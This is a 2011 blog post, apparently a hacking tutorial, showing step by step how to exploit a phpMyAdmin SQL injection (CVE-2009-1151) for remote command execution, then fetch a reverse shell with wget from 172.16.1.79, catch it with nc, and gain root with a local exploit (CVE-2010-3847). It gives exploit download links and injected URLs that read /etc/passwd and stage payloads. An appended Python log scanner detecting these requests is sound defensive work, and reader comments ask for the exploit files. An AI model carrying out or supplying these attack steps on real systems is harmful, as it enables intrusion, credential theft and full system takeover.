Friday, 11 February 2011

SQL Injection on phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1

PHPMYADMIN SQL INJECTION
CVE: CVE-2009-1151
Remote: Yes
Local: No

ROOT
CVE-2010-3847
Remote: No
Local: Yes

0) Download the php exploit from http://securityreason.com/exploitalert/6399
    Download the get_root exploit from http://seclists.org/fulldisclosure/2010/Oct/257


1) Run the exploit against the target machine.
[root@bt]# ./php_exploit  http://mytargettest.com/phpMyAdmin/

[+] checking if phpMyAdmin exists on URL provided ...
[+] phpMyAdmin cookie and form token received successfully. Good!
[+] attempting to inject phpinfo() ...
[+] success! phpinfo() injected successfully! output saved on /tmp/exploit.29597.phpinfo.flag.html
[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:
    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=ls+-l+/
    http://mytargettest.com/phpMyAdmin//config/config.inc.php?p=phpinfo();
    please send any feedback/improvements for this script to unknown.pentester<AT_sign__here>gmail.com

2) Great, that means it worked; now you can type commands on the target machine.
  
    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=ls+-l+/var
    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=cat+/etc/passwd
    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=touch+/tmp/test
    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=ls+-l+/tmp/test   (Make sure you can write in there and the file is there.)

    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=wget+-P+/tmp+http://172.16.1.79/exploits/airwolf_reverse_shell   (Download your rev_shell)

    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=chmod+777+/tmp/airwolf_reverse_shell   (Change the permissions to execute)

3) Now the exploit is on the target machine, ready to run. This exploit is just a reverse shell,
   so on my machine I run this:
   nc -l -p 8080 -vvv

4) Now I execute my reverse shell so it connects back to my machine:
    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=/tmp/airwolf_reverse_shell
  
5) Great, now you have a shell; the next step is to get root.
id

6) cd /tmp/ ; mkdir hack ; cd hack
   wget http://172.16.1.79/exploits/get_root
   wget http://172.16.1.79/exploits/payload.c

7) Run the exploit to get root, and that's it.
chmod +x ./get_root
./get_root
id

Game over!
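As an added defensive example (not part of the original post, and not code from the exploit it uses), the following Python script scans access-log lines for the traffic this walkthrough generates: the POST to the phpMyAdmin setup script that CVE-2009-1151 abuses (scripts/setup.php, which writes config/config.inc.php), and the later direct requests to config/config.inc.php carrying the ?c= and ?p= parameters shown in steps 1 and 2. The log lines, client IPs and timestamps are constructed for the example; the path constants assume a stock 2.11/3.0 directory layout.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache "combined"-format access-log lines (not real traffic). They mirror
# the request shapes the walkthrough above produces: the setup-script POST that plants
# the injected config.inc.php, then direct requests to that file with ?c= and ?p=.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Feb/2011:10:01:02 +0000] "GET /phpMyAdmin/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [11/Feb/2011:10:02:15 +0000] "POST /phpMyAdmin/scripts/setup.php HTTP/1.1" 200 813 "-" "Python-urllib/2.6"
10.0.0.7 - - [11/Feb/2011:10:02:16 +0000] "GET /phpMyAdmin//config/config.inc.php?c=ls+-l+/ HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.0.0.7 - - [11/Feb/2011:10:02:40 +0000] "GET /phpMyAdmin//config/config.inc.php?p=phpinfo(); HTTP/1.1" 200 48011 "-" "Mozilla/5.0"
10.0.0.7 - - [11/Feb/2011:10:03:01 +0000] "GET /phpMyAdmin//config/config.inc.php?c=wget+-P+/tmp+http://172.16.1.79/exploits/airwolf_reverse_shell HTTP/1.1" 200 14 "-" "Mozilla/5.0"
10.0.0.9 - - [11/Feb/2011:10:04:00 +0000] "GET /phpMyAdmin/themes/original/img/logo_right.png HTTP/1.1" 200 3051 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

SETUP_SCRIPT = "/scripts/setup.php"     # the script CVE-2009-1151 abuses to write the config (assumed stock path)
CONFIG_FILE = "/config/config.inc.php"  # where setup writes it; an include file, never a browser target
SHELL_PARAMS = {"c", "p"}               # ?c=<shell command>, ?p=<PHP code>, as in the post above
STAGING_TOOLS = {"wget", "curl", "chmod", "nc"}  # verbs used to fetch and arm a second stage


def parse_line(line):
    """Parse one combined-format line into a dict, or return None for non-matching lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = re.sub(r"/+", "/", parts.path)  # collapse // so /phpMyAdmin//config still matches
    entry["query"] = parse_qs(parts.query)
    return entry


def classify(entry):
    """Return the list of indicator labels that apply to one parsed entry (empty if benign)."""
    findings = []
    if entry["method"] == "POST" and entry["path"].endswith(SETUP_SCRIPT):
        findings.append("setup-script-post")
    if entry["path"].endswith(CONFIG_FILE):
        # Any direct request to config.inc.php is abnormal on its own, parameters or not.
        findings.append("config-inc-direct-request")
        used = sorted(SHELL_PARAMS & entry["query"].keys())
        if used:
            findings.append("webshell-param:" + ",".join(used))
            words = set()
            for name in used:
                for value in entry["query"][name]:
                    words.update(value.split())
            for tool in sorted(STAGING_TOOLS & words):
                findings.append("staging-tool:" + tool)
    return findings


def scan(log_text):
    """Run classify() over every line and return (ip, timestamp, path, findings) for hits."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        findings = classify(entry)
        if findings:
            hits.append((entry["ip"], entry["ts"], entry["path"], findings))
    return hits


def sources(hits):
    """Group hit labels by client IP so the setup POST and the later shell use line up."""
    by_ip = {}
    for ip, _ts, _path, findings in hits:
        by_ip.setdefault(ip, set()).update(findings)
    return by_ip


if __name__ == "__main__":
    for ip, ts, path, findings in scan(SAMPLE_LOG):
        print(f"{ts} {ip} {path} -> {', '.join(findings)}")
```

On the sample above the script reports the setup POST and the three config.inc.php requests, all from the same client, with the wget staging command called out separately. The phpMyAdmin documentation tells administrators to delete the config directory once setup has run, which removes the write target this injection depends on; upgrading to a release that fixes CVE-2009-1151 removes the injection itself.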

14 comments:

  1. Hey man, nice tutorial. I would like to get in touch with you. Do you have an email or messenger?

  2. Sure, my email is pochackblog@gmail.com
    I will be posting here soon my ftp so everyone can download all the needed stuff from my ftp.

  3. Hey, where can I get the get_root exploit from the link? If you can upload it somewhere I would greatly appreciate it :) Thanks in advance!!!

  4. What's that program's name? Metasploit?

  5. Nope, it's just an exploit, as I said.

  6. When I write php_exploit it says "no such file or directory".

  7. You need to download the exploit first.

    1. Where from? There isn't a download link on that page... Do you mean you have to create a file and copy/paste the code from that link?

  8. These facts are really interesting. A few of them were well known to me, but many of them were brand new to me too!
    I will print this one out and show it to my friends because they will definitely be interested in that. Thanks!
    phpMyAdmin

  9. I'm really a newbie in IT, but I want to study like this, because in my country I don't have it... Don't you want to give me this tutorial step by step? Please email me at rvirgian1@gmail.com

  10. Thanks indeed,
    I can't find the right link to download the exploit; would you please give it to me.
    N.B. the 1st link has been changed to http://cxsecurity.com/exploit
    Thanks

  11. I don't really get how to download it.
